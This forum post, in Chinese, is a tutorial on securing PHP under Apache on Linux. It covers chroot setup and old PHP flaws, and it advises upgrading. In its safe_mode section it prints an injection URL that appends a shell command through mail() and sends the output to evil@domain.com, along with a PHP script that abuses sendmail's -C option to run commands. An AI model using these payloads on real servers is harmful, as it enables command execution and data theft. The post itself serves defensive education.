QQ登录

只需一步,快速开始

登录 | 立即注册 | 找回密码

熊天琪游戏论坛 - 玩出名堂

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 20|回复: 0

[文本教程] Linux操作系统下PHP服务器安全配置技巧

[复制链接]
发表于 2017-8-13 02:04:46 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<p>一、Web服务器安全PHP其实不过是Web服务器的一个模块功能,所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全,这样就扯远了,无穷无尽。PHP可以和各种Web服务器结合,这里也只讨论Apache。非常建议以chroot方式安装启动Apache,这样即使Apache和PHP及其脚本出现漏洞,受影响的也只有这个禁锢的系统,不会危害实际系统。但是使用chroot的Apache后,给应用也会带来一定的麻烦,比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接,这在效率上会稍微差一点。还有mail函数发送邮件也是个问题,因为php.ini里的:[mailfunction];ForWin32only.SMTP=localhost;ForWin32only.sendmail_from=me@localhost.com   
都是针对Win32平台,所以需要在chroot环境下调整好sendmail。二、PHP本身问题1、远程溢出PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞,而且攻击程序已经广泛流传,成功率非常高:2、远程拒绝服务PHP-4.2.0和PHP-4.2.1存在PHPmultipart/form-dataPOST请求处理远程漏洞,虽然不能获得本地用户权限,但是也能造成拒绝服务。3、safe_mode绕过漏洞还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHPmail函数绕过safe_mode限制执行命令漏洞,4.0.5版本开始mail函数增加了第五个参数,由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单,只需用分号隔开后面加shell命令就可以了,比如存在PHP脚本evil.php:<?mail("foo@bar,"foo","bar","",$bar);?>   
执行如下的URL:?bar=;/usr/bin/id|mailevil@domain.com这将id执行的结果发送给evil@domain.com。对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数,所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令:<?#注意,下面这两个必须是不存在的,或者它们的属主和本脚本的属主是一样$script="/tmp/script123";$cf="/tmp/cf123";$fd=fopen($cf,"w");fwrite($fd,"OQ/tmpSparse=0R$*".chr(9)."$#local$@$1$:$1Mlocal,P=/bin/sh,A=sh$script");fclose($fd);$fd=fopen($script,"w");fwrite($fd,"rm-f$script$cf;");fwrite($fd,$cmd);fclose($fd);mail("nobody","","","","-C$cf");?>   
还是使用以上有问题版本PHP的用户一定要及时升级到最新版本,这样才能消除基本的安全问题。[table=98%][/table]
熊天琪的论坛真是太好啦, 我太喜欢熊天琪啦
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Loading...

QQ|小黑屋|Archiver|手机版|熊天琪 ( 鄂ICP备14006674号,鄂公网安备42020502000003号 

安全联盟

GMT+8, 2017-10-23 10:35 , Processed in 0.133105 second(s), 31 queries .

Powered by Discuz! X3.2 Licensed

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表